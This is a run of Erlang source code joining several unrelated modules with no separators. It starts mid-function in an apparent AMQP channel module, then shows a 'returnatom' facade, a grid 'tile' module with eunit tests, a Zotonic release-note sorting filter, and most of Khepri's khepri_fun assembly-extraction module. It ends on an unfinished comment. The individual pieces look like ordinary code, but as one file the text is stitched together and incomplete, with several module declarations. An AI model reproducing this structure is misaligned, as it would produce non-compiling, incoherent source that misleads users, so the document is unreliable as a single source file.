                                          {confirm_timeout, From})
                        end,
                 {noreply,
                  State#state{waiting_set = gb_trees:insert(From, TRef, WSet)}}
    end.
%% Forward a method (plus args, and optionally a delivery context) to the
%% consumer callback process via amqp_gen_consumer.
call_to_consumer(Method, Args, #state{consumer = Consumer}) ->
    amqp_gen_consumer:call_consumer(Consumer, Method, Args).
call_to_consumer(Method, Args, DeliveryCtx, #state{consumer = Consumer}) ->
    amqp_gen_consumer:call_consumer(Consumer, Method, Args, DeliveryCtx).
%% Cancel a confirm-timeout timer; 'undefined' means no timer was armed
%% (infinite timeout), so there is nothing to do.
safe_cancel_timer(TRef) when TRef =/= undefined ->
    erlang:cancel_timer(TRef);
safe_cancel_timer(undefined) ->
    ok.
%%% ----------------------------------------------------------------------------
%%% @author <<EMAIL>>
%%% @doc
%%% Library for creating a dynamic module whose functions return atoms.
%%% This module is a thin facade: every call delegates to
%%% returnatom_server (the per-module worker) or returnatom_sup (the root
%%% supervisor).
%%% @end
%% -----------------------------------------------------------------------------
-module(returnatom).
-author("<EMAIL>").
%% -----------------------------------------------------------------------------
%% Exports:
%% API:
-export([start/0
        ,stop/0
        ,start/1
        ,stop/1
        ,add/3
        ,replace/3
        ,delete/2
        ,modules/0
        ,start_link/1
        ,stop_link/1]).
%% -----------------------------------------------------------------------------
%% API:
-spec
start() ->
    ok | {error, term()}.
%% @doc
%% Starts returnatom application.
%% @end
start() ->
    application:start(returnatom).
-spec
stop() ->
    ok.
%% @doc
%% Stops returnatom application.
%% @end
%% NOTE(review): application:stop/1 can also return {error, _}; confirm
%% whether the 'ok'-only spec is intentional.
stop() ->
    application:stop(returnatom).
-spec
start(atom()) ->
    ok.
%% @doc
%% Starts a compiler server under root supervisor.
%% @end
%% NOTE(review): returnatom_sup:start/1 may return {ok, Pid} | {error, _}
%% (typical supervisor child start); confirm the 'ok' return spec.
start(Mod) when erlang:is_atom(Mod) ->
    returnatom_sup:start(Mod).
-spec
stop(atom()) ->
    ok | {error, term()}.
%% @doc
%% Stops a compiler server from root supervisor.
%% @end
stop(Mod) when erlang:is_atom(Mod) ->
    returnatom_sup:stop(Mod).
-spec
add(atom(), atom(), atom()) ->
    ok | {error, term()}.
%% @doc
%% Adds a function with specified return value to available module.<br/>
%% Note that if function exists, it does not replace it.
%% @end
add(Name, Func, ReturnAtom) ->
    returnatom_server:add(Name, Func, ReturnAtom).
-spec
replace(atom(), atom(), atom()) ->
    ok | {error, term()}.
%% @doc
%% Adds a function with specified return value to available module or
%% replace it if exists.
%% @end
replace(Name, Func, ReturnAtom) ->
    returnatom_server:replace(Name, Func, ReturnAtom).
-spec
delete(atom(), atom()) ->
    ok | {error, term()}.
%% @doc
%% Deletes a function from module if exists.
%% @end
delete(Name, Func) ->
    returnatom_server:delete(Name, Func).
-spec
modules() ->
    [module()] | [].
%% @doc
%% Gives list of available modules which their server processes are under
%% root supervision.
%% @end
modules() ->
    returnatom_sup:modules().
-spec
start_link(module()) ->
    {ok, pid()} | {error, term()}.
%% @doc
%% Starts and links server process to caller. Note that server process will
%% be registered with module name locally.
%% @end
start_link(Mod) ->
    returnatom_server:start_link(Mod).
-spec
stop_link(atom()) ->
    ok.
%% @doc
%% Stops a server process directly.
%% @end
stop_link(Name) ->
    returnatom_server:stop(Name).
-module(tile).
-export([load/1, parse/1, size/1, at/3, rotate/2, flip/1, print/1, print_one/1]).
-export([left/1, right/1, top/1, bottom/1, merge/1]).
-include_lib("eunit/include/eunit.hrl").
%% A tile is a square grid of characters stored as a list of row strings.
%% Rotations and flips are represented lazily as wrapper tuples
%% ({rotate, Degrees, Tile} / {flip, Tile}) and resolved per pixel in at/3.
-record(tile, {rows}).
% Loads input from the given filename and parses it into tiles.
% (Fix: the file handle is now closed instead of being leaked.)
load(Filename) ->
    {ok, File} = file:open(Filename, [read]),
    {ok, Text} = file:read(File, 1024*1024),
    ok = file:close(File),
    parse(string:split(Text, "\n", all)).
% Parses a set of input lines into a map from tile ID to tile data.
% Rows accumulate in reverse while inside a tile and are flipped back on
% the blank separator line; a missing trailing blank line is tolerated.
parse(Lines) -> parse(Lines, undefined, #{}).
parse([Line | Rest], undefined, Acc) ->
    {ID, _} = string:take(string:prefix(Line, "Tile "), "0123456789"),
    parse(Rest, {list_to_integer(ID), []}, Acc);
parse([Line | Rest], {ID, Rows}, Acc) when length(Line) > 0 ->
    parse(Rest, {ID, [Line | Rows]}, Acc);
parse(["" | Rest], {ID, Rows}, Acc) ->
    parse(Rest, undefined, Acc#{ ID => #tile{rows=lists:reverse(Rows)} });
parse([], Tile, Acc) when Tile /= undefined -> parse([""], Tile, Acc);
parse([], undefined, Acc) -> Acc.
% Returns the side length of the (square) tile; wrappers delegate to the
% underlying tile. Note: this shadows the erlang:size/1 BIF, so internal
% calls are module-qualified (tile:size/1).
size({rotate, _, Tile}) -> tile:size(Tile);
size({flip, Tile}) -> tile:size(Tile);
size(Tile) -> length(Tile#tile.rows).
% Returns the character at 1-based position X, Y on the tile. Wrapper
% coordinates are mapped back into the base tile: clockwise rotation by
% 90/180/270 degrees, or a horizontal mirror for flips.
at({rotate, D, Tile}, X, Y) ->
    Max = tile:size(Tile) + 1,
    {XP, YP} = case D of
                   90  -> {Y, Max - X};
                   180 -> {Max - X, Max - Y};
                   270 -> {Max - Y, X}
               end,
    at(Tile, XP, YP);
at({flip, Tile}, X, Y) ->
    Max = tile:size(Tile) + 1,
    at(Tile, Max - X, Y);
at(Tile, X, Y) ->
    lists:nth(X, lists:nth(Y, Tile#tile.rows)).
% Rotates a tile clockwise D degrees (D must be 90, 180 or 270; see at/3).
rotate(Tile, D) -> {rotate, D, Tile}.
% Flips a tile over horizontally.
flip(Tile) -> {flip, Tile}.
% Helpers to access the edges of the tile, always read left-to-right or
% top-to-bottom in the tile's own orientation.
top(Tile) ->
    Max = tile:size(Tile),
    lists:map(fun (X) -> at(Tile, X, 1) end, lists:seq(1, Max)).
bottom(Tile) ->
    Max = tile:size(Tile),
    lists:map(fun (X) -> at(Tile, X, Max) end, lists:seq(1, Max)).
left(Tile) ->
    Max = tile:size(Tile),
    lists:map(fun (Y) -> at(Tile, 1, Y) end, lists:seq(1, Max)).
right(Tile) ->
    Max = tile:size(Tile),
    lists:map(fun (Y) -> at(Tile, Max, Y) end, lists:seq(1, Max)).
% A full horizontal row of pixels at height Y.
row(Tile, Y) ->
    lists:map(fun (X) -> at(Tile, X, Y) end, lists:seq(1, tile:size(Tile))).
% Merges a grid of tiles into a single super-tile, stripping each tile's
% one-pixel border on all four sides.
% NOTE(review): lists:reverse/1 flips the merged image vertically relative
% to the input grid order; callers that try every rotation/flip are
% unaffected, but confirm this is intentional.
merge(Tiles) ->
    Rows = lists:flatmap(fun (Row) -> merge_row(Row) end, Tiles),
    #tile{rows = lists:reverse(Rows)}.
% Merges a horizontal row of tiles into rows of pixels, excluding the top
% and bottom border rows (Y runs from 2 to size-1).
merge_row(Tiles) ->
    lists:map(fun (Y) ->
                      merge_row(Tiles, Y)
              end, lists:seq(2, tile:size(hd(Tiles))-1)).
% Merges a single Y line across multiple tiles, dropping the first and
% last pixel of each tile's row.
% Fix: the sublist length was length(Row)-1, which kept the right border
% pixel (making the merged tile non-square: N-2 rows but N-1 columns per
% tile) while merge_row/1 strips both vertical borders. length(Row)-2
% drops both the left and the right border, matching the vertical case.
merge_row(Tiles, Y) ->
    lists:flatmap(fun (Tile) ->
                          Row = row(Tile, Y),
                          lists:sublist(Row, 2, length(Row)-2)
                  end, Tiles).
% Prints a sequence of tiles side by side, separated by a space.
print(Tiles) ->
    lists:foreach(fun (Y) ->
                          print_row(Tiles, Y)
                  end, lists:seq(1, tile:size(hd(Tiles)))).
print_row([Tile | Rest], Y) ->
    print_one_row(Tile, Y),
    io:format(" "),
    print_row(Rest, Y);
print_row([], _) -> io:format("~n").
% Prints a single tile, one row per line.
print_one(Tile) ->
    Seq = lists:seq(1, tile:size(Tile)),
    lists:foreach(fun (Y) ->
                          print_one_row(Tile, Y),
                          io:format("~n")
                  end, Seq).
print_one_row(Tile, Y) ->
    lists:foreach(fun (X) ->
                          io:format("~c", [at(Tile, X, Y)])
                  end, lists:seq(1, tile:size(Tile))).
-ifdef(TEST).
test_tile() ->
    Tiles = parse([
        "Tile 2311:",
        "..##.#..#.",
        "##..#.....",
        "#...##..#.",
        "####.#...#",
        "##.##.###.",
        "##...#.###",
        ".#.#.#..##",
        "..#....#..",
        "###...#.#.",
        "..###..###"
    ]),
    maps:get(2311, Tiles).
at_test() ->
    Tile = test_tile(),
    ?assertEqual($., at(Tile, 1, 1)),
    ?assertEqual($., at(Tile, 2, 1)),
    ?assertEqual($#, at(Tile, 3, 1)),
    ?assertEqual($#, at(Tile, 1, 2)).
edges_test() ->
    Tile = test_tile(),
    ?assertEqual("..##.#..#.", top(Tile)),
    ?assertEqual(".#####..#.", left(Tile)),
    ?assertEqual("...#.##..#", right(Tile)),
    ?assertEqual("..###..###", bottom(Tile)).
flip_test() ->
    Tile = flip(test_tile()),
    ?assertEqual(".#..#.##..", top(Tile)),
    ?assertEqual("...#.##..#", left(Tile)).
rotate_test() ->
    Tile = rotate(test_tile(), 90),
    ?assertEqual(".#..#####.", top(Tile)),
    ?assertEqual("..##.#..#.", right(Tile)).
-endif.
%% @author <NAME> <<EMAIL>>
%% @copyright 2021 <NAME>
%% @doc Template filter for sorting release note resources on their version number.
%% Copyright 2021 <NAME>
%%
%% Licensed under the Apache License, Version 2.0 (the "License");
%% you may not use this file except in compliance with the License.
%% You may obtain a copy of the License at
%%
%% http://www.apache.org/licenses/LICENSE-2.0
%%
%% Unless required by applicable law or agreed to in writing, software
%% distributed under the License is distributed on an "AS IS" BASIS,
%% WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
%% See the License for the specific language governing permissions and
%% limitations under the License.
% The module name of a filter MUST start with 'filter_'
% It is good habit to prefix the filter with the name of the module or site.
% In this way a name clash with other modules and sites is prevented.
-module(filter_zotonicwww2_by_version).
-export([
    % The name of the filter MUST be used as the entry point.
    zotonicwww2_by_version/2
]).
-include_lib("zotonic_core/include/zotonic.hrl").
% The /2 version is for filters without extra arguments. This filter
% is used in a template like:
%
%     {{ ids|zotonicwww2_by_version }}
%
% Returns the ids sorted on version, highest version first. Any other
% argument shape than a list or 'undefined' crashes with function_clause,
% which is intentional (assertive matching).
zotonicwww2_by_version(undefined, _Context) ->
    [];
zotonicwww2_by_version(List, Context) when is_list(List) ->
    % Pair every id with its parsed version so a plain term sort orders
    % them; {Version, Id} tuples compare element-wise.
    Vs = lists:map(
        fun(Id) ->
            {version(Id, Context), Id}
        end,
        List),
    % Highest version number first, so reverse after sorting
    {_, Ids1} = lists:unzip( lists:reverse(lists:sort(Vs)) ),
    Ids1.
% Parse the version list for a single resource from its title.
version(Id, Context) ->
    % Request the title of the release note, without checking access control
    Title = m_rsc:p_no_acl(Id, title, Context),
    % Titles are translatable and can be:
    % - a #trans{} record
    % - a binary (utf8 encoded)
    % - undefined
    %
    % The z_trans:lookup_fallback/2 call maps a #trans{} record to the
    % binary in the correct language.
    Title1 = z_trans:lookup_fallback(Title, Context),
    vsn(Title1).
% Release note titles are always of the form: "Release 9.9.9"
% Map this to integers for easy sorting.
% An undefined title becomes [], which sorts below every real version;
% a "Notes..." title becomes [100000] so it sorts above all releases
% (assuming major versions stay below 100000 — a safe bet here).
vsn(undefined) ->
    [];
vsn(<<"Release ", Vsn/binary>>) ->
    vsn(Vsn);
vsn(<<"Notes", _/binary>>) ->
    [100000];
vsn(Vsn) ->
    Vs = binary:split( z_string:trim(Vsn), <<".">>, [ global ]),
    lists:map(
        fun(N) ->
            % Non-numeric components are kept verbatim; note that in the
            % Erlang term order such binaries sort after all integers.
            try z_convert:to_integer(N)
            catch _:_ -> N
            end
        end,
        Vs).
%% This Source Code Form is subject to the terms of the Mozilla Public
%% License, v. 2.0. If a copy of the MPL was not distributed with this
%% file, You can obtain one at https://mozilla.org/MPL/2.0/.
%%
%% Copyright (c) 2021-2022 VMware, Inc. or its affiliates. All rights reserved.
%%
%% @doc Anonymous function extraction API.
%%
%% This module is responsible for extracting the code of an anonymous function.
%% The goal is to be able to store the extracted function and execute it later,
%% regardless of the availability of the initial Erlang module which declared
%% it.
%%
%% This module also provides a way for the caller to indicate forbidden
%% operations or function calls.
%%
%% This module works on assembly code to perform all checks and prepare the
%% storable copy of a function. It uses {@link beam_disasm:file/1} from the
%% `compiler' application to extract the assembly code. After the assembly
%% code was extracted and modified, the compiler is used again to compile the
%% code back to an executable module.
%%
%% If the anonymous function calls other functions, either in the same module
%% or in another one, the code of the called functions is extracted and copied
%% as well. This is to make sure the result is completely standalone.
%%
%% To avoid any copies of standard Erlang APIs or Khepri itself, it is
%% possible to specify a list of modules which should not be copied. In this
%% case, calls to functions in those modules are left unmodified.
%%
%% Once the code was extracted and verified, a new module is generated as an
%% "assembly form", ready to be compiled again to an executable module. The
%% generated module has a single `run/N' function. This function contains the
%% code of the extracted anonymous function.
%%
%% Because this process works on the assembly code, it means that if the
%% initial module hosting the anonymous function was compiled with Erlang
%% version N, it will probably not compile or run on older versions of Erlang.
%% The reason is that a newer compiler may use instructions which are unknown
%% to older runtimes.
%%
%% There is a special treatment for anonymous functions evaluated by
%% `erl_eval' (e.g. in the Erlang shell). "erl_eval functions" are lambdas
%% parsed from text and are evaluated using `erl_eval'.
%%
%% This kind of lambdas becomes a local function in the `erl_eval' module.
%%
%% Their assembly code isn't available in the `erl_eval' module. However, the
%% abstract code (i.e. after parsing but before compilation) is available in
%% the `env'. We compile that abstract code and extract the assembly from that
%% compiled beam.
-module(khepri_fun).
-include_lib("kernel/include/logger.hrl").
-include_lib("stdlib/include/assert.hrl").
-include("src/internal.hrl").
-export([to_standalone_fun/2,
exec/2]).
%% FIXME: compile:forms/2 is incorrectly specified and doesn't accept
%% assembly. This breaks compile/1 and causes a cascade of errors.
%%
%% The following basically disable Dialyzer for this module unfortunately...
%% This can be removed once we start using Erlang 25 to run Dialyzer.
-dialyzer({nowarn_function, [compile/1,
to_standalone_fun/2,
to_standalone_fun1/2,
to_standalone_fun2/2,
to_standalone_env/1,
to_standalone_arg/2,
handle_compilation_error/2,
add_comment_and_retry/4,
add_comment_to_function/7,
add_comment_to_code/5,
are_comments_conflicting/2]}).
-type fun_info() :: #{arity => arity(),
env => any(),
index => any(),
name => atom(),
module => module(),
new_index => any(),
new_uniq => any(),
pid => any(),
type => local | external,
uniq => any()}.
-type beam_instr() :: atom() | tuple().
-type label() :: pos_integer().
%% -------------------------------------------------------------------
%% Taken from lib/compiler/src/beam_disasm.hrl,
%% commit ...ba84b07fb8a98d755216e78fa79 (commit hash prefix lost during
%% extraction)
-record(function, {name :: atom(),
arity :: byte(),
entry :: beam_lib:label(), %% unnecessary ?
code = [] :: [beam_instr()]}).
-record(beam_file, {module :: module(),
labeled_exports = [] :: [beam_lib:labeled_entry()],
attributes = [] :: [beam_lib:attrib_entry()],
compile_info = [] :: [beam_lib:compinfo_entry()],
code = [] :: [#function{}]}).
%% -------------------------------------------------------------------
-type ensure_instruction_is_permitted_fun() ::
fun((beam_instr()) -> ok).
-type should_process_function_fun() ::
fun((module(), atom(), arity(), module()) -> boolean()).
-type is_standalone_fun_still_needed_fun() ::
fun((#{calls := #{mfa() => true},
errors := [any()]}) -> boolean()).
-type standalone_fun() :: #standalone_fun{} | fun().
-type options() :: #{ensure_instruction_is_permitted =>
ensure_instruction_is_permitted_fun(),
should_process_function =>
should_process_function_fun(),
is_standalone_fun_still_needed =>
is_standalone_fun_still_needed_fun()}.
-export_type([standalone_fun/0,
options/0]).
-record(state, {generated_module_name :: module() | undefined,
entrypoint :: mfa() | undefined,
checksums = #{} :: #{module() => binary()},
fun_info :: fun_info(),
calls = #{} :: #{mfa() => true},
all_calls = #{} :: #{mfa() => true},
functions = #{} :: #{mfa() => #function{}},
mfa_in_progress :: mfa() | undefined,
function_in_progress :: atom() | undefined,
next_label = 1 :: label(),
label_map = #{} :: #{{module(), label()} => label()},
errors = [] :: [any()],
options = #{} :: options()}).
-type asm() :: {module(),
[{atom(), arity()}],
[],
[#function{}],
label()}.
-spec to_standalone_fun(Fun, Options) -> StandaloneFun when
      Fun :: fun(),
      Options :: options(),
      StandaloneFun :: standalone_fun().

%% @doc Converts an anonymous function to its standalone form.
%%
%% This is a thin wrapper around {@link to_standalone_fun1/2} which drops the
%% internal state and keeps only the resulting standalone fun.
to_standalone_fun(Fun, Options) ->
    element(1, to_standalone_fun1(Fun, Options)).
-spec to_standalone_fun1(Fun, Options) -> {StandaloneFun, State} when
      Fun :: fun(),
      Options :: options(),
      StandaloneFun :: standalone_fun(),
      State :: #state{}.

%% @private Initializes the extraction state from the fun's metadata.
%%
%% The fun itself is pre-recorded in `all_calls' so that callbacks can see the
%% top-level entry point among the collected calls.
to_standalone_fun1(Fun, Options) ->
    FunInfo = maps:from_list(erlang:fun_info(Fun)),
    #{module := Module, name := Name, arity := Arity} = FunInfo,
    InitialState = #state{fun_info = FunInfo,
                          all_calls = #{{Module, Name, Arity} => true},
                          options = Options},
    to_standalone_fun2(Fun, InitialState).
-spec to_standalone_fun2(Fun, State) -> {StandaloneFun, State} when
      Fun :: fun(),
      State :: #state{},
      StandaloneFun :: standalone_fun().

%% @private Drives the extraction: pass 1, environment handling, pass 2 and
%% compilation of the generated module.
%%
%% If the `should_process_function' or `is_standalone_fun_still_needed'
%% callbacks decide the fun should not be extracted, the original fun is
%% returned unchanged (the `standalone_fun()' type covers both cases).
to_standalone_fun2(
  Fun,
  #state{fun_info = #{module := Module,
                      name := Name,
                      arity := Arity,
                      type := Type}} = State) ->
    %% Don't extract functions like "fun dict:new/0" which are not meant to be
    %% copied.
    {ShouldProcess,
     State1} = case Type of
                   local ->
                       should_process_function(
                         Module, Name, Arity, Module, State);
                   external ->
                       %% An external fun must point to an exported function;
                       %% make sure the module is loaded before checking.
                       _ = code:ensure_loaded(Module),
                       case erlang:function_exported(Module, Name, Arity) of
                           true ->
                               should_process_function(
                                 Module, Name, Arity, undefined, State);
                           false ->
                               throw({call_to_unexported_function,
                                      {Module, Name, Arity}})
                       end
               end,
    case ShouldProcess of
        true ->
            %% Pass 1 copies the code of the fun and of every function it
            %% calls (transitively), renaming labels along the way.
            State2 = pass1(State1),
            %% Fun environment to standalone term.
            %%
            %% For "regular" lambdas, variables declared outside of the
            %% function body are put in this `env'. We need to process them in
            %% case they reference other lambdas for instance. We keep the end
            %% result to store it alongside the generated module, but not
            %% inside the module to avoid an increase in the number of
            %% identical modules with different environment.
            %%
            %% However for `erl_eval' functions created from lambdas, the env
            %% contains the parsed source code of the function. We don't need
            %% to interpret it.
            %%
            %% TODO: `to_standalone_env()' uses `to_standalone_fun1()' to
            %% extract and compile lambdas passed as arguments. It means they
            %% are fully compiled even though
            %% `is_standalone_fun_still_needed()' returns false later. This is
            %% a waste of resources and this function can probably be split
            %% into two parts to allow the environment to be extracted before
            %% and compiled after, once we are sure we need to create the
            %% final standalone fun.
            {Env, State3} = case Module =:= erl_eval andalso Type =:= local of
                                false -> to_standalone_env(State2);
                                true -> {[], State2}
                            end,
            %% We offer one last chance to the caller to determine if a
            %% standalone function is still useful for him.
            %%
            %% This callback is only used for the top-level lambda. In other
            %% words, if the `env' contains other lambdas (i.e. anonymous
            %% functions passed as argument to the top-level one), the
            %% callback is not used. However, calls and errors from those
            %% inner lambdas are accumulated and can be used by the callback.
            case is_standalone_fun_still_needed(State3) of
                true ->
                    %% Any error recorded during pass 1 aborts the extraction
                    %% here, before we pay for pass 2 and compilation.
                    process_errors(State3),
                    Asm = pass2(State3),
                    {GeneratedModuleName, Beam} = compile(Asm),
                    StandaloneFun = #standalone_fun{
                                       module = GeneratedModuleName,
                                       beam = Beam,
                                       arity = Arity,
                                       env = Env},
                    {StandaloneFun, State3};
                false ->
                    {Fun, State3}
            end;
        false ->
            process_errors(State1),
            {Fun, State1}
    end.
-spec compile(Asm) -> {Module, Beam} when
      Asm :: asm(), %% FIXME: compile:forms/2 is incorrectly specified.
      Module :: module(),
      Beam :: binary().

%% @private Compiles the generated assembly form to a beam binary.
%%
%% Warnings are promoted to errors; any failure is delegated to
%% `handle_compilation_error/2' which may patch the assembly and retry.
compile(Asm) ->
    Options = [from_asm,
               binary,
               warnings_as_errors,
               return_errors,
               return_warnings,
               deterministic],
    case compile:forms(Asm, Options) of
        {ok, Module, Beam, []} ->
            {Module, Beam};
        Error ->
            handle_compilation_error(Asm, Error)
    end.
%% @private Works around a specific `beam_validator' failure, or rethrows.
%%
%% When the validator rejects a `get_tuple_element' instruction because it
%% lost track of a tuple's type (`{actual, any}'), we inject a `var_info'
%% assembly annotation describing the needed type and retry the compilation
%% through `add_comment_and_retry/4'. Any other error is reported as
%% `{compilation_failure, Error, Asm}'.
handle_compilation_error(
  Asm,
  {error,
   [{_GeneratedModuleName,
     [{_, beam_validator,
       {FailingFun,
        {{get_tuple_element, Src, _Element, _Dst},
         _,
         {bad_type,
          {needed, {t_tuple, _Size, _, _Fields} = NeededType},
          {actual, any}}}}}]}],
   []} = Error) ->
    VarInfo = {var_info, Src, [{type, NeededType}]},
    Comment = {'%', VarInfo},
    add_comment_and_retry(Asm, Error, FailingFun, Comment);
handle_compilation_error(
  Asm,
  %% Same as above, but returned by Erlang 23's compiler instead of Erlang 24+.
  {error,
   [{_GeneratedModuleName,
     [{beam_validator,
       {FailingFun,
        {{get_tuple_element, Src, _Element, _Dst},
         _,
         {bad_type,
          {needed, {t_tuple, _Size, _, _Fields} = NeededType},
          {actual, any}}}}}]}],
   []} = Error) ->
    VarInfo = {var_info, Src, [{type, NeededType}]},
    Comment = {'%', VarInfo},
    add_comment_and_retry(Asm, Error, FailingFun, Comment);
handle_compilation_error(Asm, Error) ->
    throw({compilation_failure, Error, Asm}).
%% @private Injects an assembly annotation into the failing function and
%% recompiles the patched assembly form.
add_comment_and_retry(
  Asm, Error, {GeneratedModuleName, FunName, FunArity} = _FailingFun, Comment) ->
    %% The failing MFA's module must be the generated module itself; the
    %% match below asserts it while destructuring the assembly form.
    {GeneratedModuleName,
     Exports,
     Attributes,
     Functions,
     Labels} = Asm,
    PatchedFunctions = add_comment_to_function(
                         Asm, Error, Functions, FunName, FunArity, Comment,
                         []),
    PatchedAsm = {GeneratedModuleName,
                  Exports,
                  Attributes,
                  PatchedFunctions,
                  Labels},
    compile(PatchedAsm).
%% @private Walks the function list until it finds the failing function, then
%% annotates that function's code with `Comment'.
%%
%% Functions seen before the match are accumulated in `SeenAcc' (reversed) and
%% stitched back in front of the patched function.
add_comment_to_function(
  Asm, Error,
  [#function{name = Name, arity = Arity, code = Code} = Target | Tail],
  Name, Arity, Comment, SeenAcc) ->
    AnnotatedCode = add_comment_to_code(Asm, Error, Code, Comment, []),
    Annotated = Target#function{code = AnnotatedCode},
    lists:reverse(SeenAcc, [Annotated | Tail]);
add_comment_to_function(
  Asm, Error,
  [Other | Tail], Name, Arity, Comment, SeenAcc) ->
    add_comment_to_function(
      Asm, Error, Tail, Name, Arity, Comment, [Other | SeenAcc]).
%% @private Inserts `Comment' before the first "real" instruction of a
%% function's code.
%%
%% Leading `label', `func_info' and existing `%' comment instructions are
%% skipped so the annotation lands where `beam_validator' expects it. If an
%% already-present annotation conflicts with the one we are about to add
%% (same register, see `are_comments_conflicting/2'), we give up to avoid an
%% endless patch-and-retry loop.
add_comment_to_code(
  Asm, Error,
  [{label, _} = Instruction | Rest],
  Comment, Result) ->
    add_comment_to_code(Asm, Error, Rest, Comment, [Instruction | Result]);
add_comment_to_code(
  Asm, Error,
  [{func_info, _, _, _} = Instruction | Rest],
  Comment, Result) ->
    add_comment_to_code(Asm, Error, Rest, Comment, [Instruction | Result]);
add_comment_to_code(
  Asm, Error,
  [{'%', _} = Instruction | Rest],
  Comment, Result) ->
    case are_comments_conflicting(Instruction, Comment) of
        false ->
            add_comment_to_code(
              Asm, Error, Rest, Comment, [Instruction | Result]);
        true ->
            throw(
              {conflicting_assembly_annotations,
               Instruction, Comment, Error, Asm})
    end;
add_comment_to_code(
  _Asm, _Error,
  Rest,
  Comment, Result) ->
    %% First non-skippable instruction reached: insert the comment here.
    lists:reverse(Result) ++ [Comment | Rest].
%% @private Tells whether two assembly annotations cannot coexist.
%%
%% Two `var_info' annotations targeting the same register (i.e. the same
%% variable) would contradict each other, so they are considered conflicting;
%% everything else is fine.
are_comments_conflicting(
  {'%', {var_info, Register, _}} = _ExistingComment,
  {'%', {var_info, Register, _}} = _NewComment) ->
    true;
are_comments_conflicting(_ExistingComment, _NewComment) ->
    false.
-spec exec(StandaloneFun, Args) -> Ret when
      StandaloneFun :: standalone_fun(),
      Args :: [any()],
      Ret :: any().

%% @doc Executes a standalone fun (or a plain fun) with the given arguments.
%%
%% For an extracted fun, the generated module is loaded on first use and its
%% `run/N' entry point is applied to `Args' plus the flattened environment.
exec(
  #standalone_fun{module = Module,
                  beam = Beam,
                  arity = Arity,
                  env = Env},
  Args) when length(Args) =:= Arity ->
    _ = case code:is_loaded(Module) of
            false ->
                %% Not loaded yet: load the embedded beam binary.
                {module, _} = code:load_binary(Module, ?MODULE_STRING, Beam);
            _ ->
                ok
        end,
    ExtraArgs = to_actual_arg(Env),
    erlang:apply(Module, run, Args ++ ExtraArgs);
exec(#standalone_fun{} = StandaloneFun, Args) ->
    %% Wrong number of arguments: mirror the emulator's badarity exit.
    exit({badarity, {StandaloneFun, Args}});
exec(Fun, Args) ->
    %% Regular funs are applied directly.
    erlang:apply(Fun, Args).
%% -------------------------------------------------------------------
%% Code processing [Pass 1]
%% -------------------------------------------------------------------
-spec pass1(State) -> State when
      State :: #state{}.

%% @private Pass 1: records the entrypoint and copies the code of the fun and
%% of every function it calls, directly or indirectly.
%%
%% The first clause handles `erl_eval' lambdas: their entrypoint keeps the
%% declared arity because their `env' holds abstract code, not captured
%% variables.
pass1(
  #state{fun_info = #{module := erl_eval, type := local} = Info,
         checksums = Checksums} = State) ->
    #{module := Module,
      name := Name,
      arity := Arity} = Info,
    %% `new_uniq' is used as the module checksum — presumably a hash of the
    %% fun's code; we only rely on it being a binary.
    Checksum = maps:get(new_uniq, Info),
    ?assert(is_binary(Checksum)),
    Checksums1 = Checksums#{Module => Checksum},
    State1 = State#state{checksums = Checksums1,
                         entrypoint = {Module, Name, Arity}},
    pass1_process_function(Module, Name, Arity, State1);
pass1(
  #state{fun_info = Info,
         checksums = Checksums} = State) ->
    #{module := Module,
      name := Name,
      arity := Arity,
      env := Env} = Info,
    %% Internally, a lambda takes both its declared arguments and the values
    %% captured from its environment (i.e. variables declared in the function
    %% which defined that lambda), hence the extended arity below.
    InternalArity = Arity + length(Env),
    State1 = case maps:get(type, Info) of
                 local ->
                     Checksum = maps:get(new_uniq, Info),
                     ?assert(is_binary(Checksum)),
                     Checksums1 = Checksums#{Module => Checksum},
                     State#state{checksums = Checksums1};
                 external ->
                     %% External funs (`fun M:F/A') carry no `new_uniq'
                     %% checksum worth recording here.
                     State
             end,
    State2 = State1#state{entrypoint = {Module, Name, InternalArity}},
    pass1_process_function(Module, Name, InternalArity, State2).
-spec pass1_process_function(Module, Name, Arity, State) -> State when
      Module :: module(),
      Name :: atom(),
      Arity :: arity(),
      State :: #state{}.

%% @private Copies and processes one function, then recurses into all the
%% functions it calls.
%%
%% A function already present in `functions' was processed before and is
%% skipped, which also breaks recursion cycles.
pass1_process_function(
  Module, Name, Arity,
  #state{functions = Functions} = State)
  when is_map_key({Module, Name, Arity}, Functions) ->
    State;
pass1_process_function(Module, Name, Arity, State0) ->
    MFA = {Module, Name, Arity},
    %% Reset the per-function call set before walking this function's code.
    State1 = State0#state{mfa_in_progress = MFA,
                          calls = #{}},
    {RawFunction, State2} = lookup_function(Module, Name, Arity, State1),
    {ProcessedFunction, State3} = pass1_process_function_code(
                                    RawFunction, State2),
    #state{calls = PendingCalls,
           functions = Functions0} = State3,
    State4 = State3#state{functions = Functions0#{MFA => ProcessedFunction}},
    %% Recurse with the functions called by this one.
    maps:fold(
      fun({M, F, A}, true, StAcc) ->
              pass1_process_function(M, F, A, StAcc)
      end, State4, PendingCalls).
-spec pass1_process_function_code(Function, State) -> {Function, State} when
      Function :: #function{},
      State :: #state{}.

%% @private Processes one function's instruction list and fixes its entry
%% label.
%%
%% Labels are renumbered globally across all copied functions; the asserts
%% check that renumbering shifted every label of this function by the same
%% constant offset.
pass1_process_function_code(
  #function{entry = OldEntryLabel,
            code = Instructions} = Function,
  #state{mfa_in_progress = {Module, _, _} = MFA,
         next_label = NextLabel,
         functions = Functions} = State) ->
    ?assertNot(maps:is_key(MFA, Functions)),
    %% Compute label diff.
    {label, FirstLabel} = lists:keyfind(label, 1, Instructions),
    LabelDiff = NextLabel - FirstLabel,
    %% Renumber labels, record calls and patch mis-decoded instructions.
    {Instructions1, State1} = pass1_process_instructions(Instructions, State),
    %% Compute its new entry label.
    #state{label_map = LabelMap} = State1,
    LabelKey = {Module, OldEntryLabel},
    NewEntryLabel = maps:get(LabelKey, LabelMap),
    ?assertEqual(LabelDiff, NewEntryLabel - OldEntryLabel),
    %% Rename function & fix its entry label.
    Function1 = Function#function{
                  entry = NewEntryLabel,
                  code = Instructions1},
    {Function1, State1}.
-spec pass1_process_instructions(Instructions, State) ->
    {Instructions, State} when
      Instructions :: [beam_instr()],
      State :: #state{}.

%% @private Entry point for instruction processing; starts the accumulator.
pass1_process_instructions(Instrs, St) ->
    pass1_process_instructions(Instrs, St, []).
%% The first group of clauses of this function patch incorrectly decoded
%% instructions. These clauses recurse after fixing the instruction to enter
%% the second group of clauses below.
%%
%% The second group of clauses:
%% 1. ensures the instruction is known and allowed,
%% 2. records all calls that need their code to be copied and
%% 3. records jump labels.
%% First group.
